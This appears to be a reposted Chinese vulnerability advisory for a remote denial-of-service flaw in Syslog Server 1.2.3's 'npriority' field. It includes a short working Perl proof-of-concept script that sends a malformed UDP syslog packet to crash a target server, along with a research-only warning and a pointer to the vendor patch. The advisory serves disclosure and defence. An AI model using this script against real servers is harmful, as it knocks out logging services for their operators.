Syslog Server “npriority”字段远程拒绝服务漏洞

Syslog Server "npriority"字段远程拒绝服务漏洞


发布日期:2016-07-04
更新日期:2016-07-07

受影响系统:

Syslog Server Syslog Server 1.2.3

描述:

Syslog Server是适用于Windows系统的syslog服务器。

syslog Server未能处理npriority字段的内容,存在安全漏洞,构造的数据包可导致服务器崩溃。

<*来源:ChaoYi.Huang_at_connect.polyu.hk
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);
$|=1;

$host=shift;
$port=shift;

die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));

$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";

$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;

$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
$con->send($packet);
print "Done!\n";
$con->close;

exit(0);

建议:

厂商补丁:

Syslog Server
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://sourceforge.net/p/syslog-server/

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/c3078d0afb0e0be2f045e7383558fd3f.html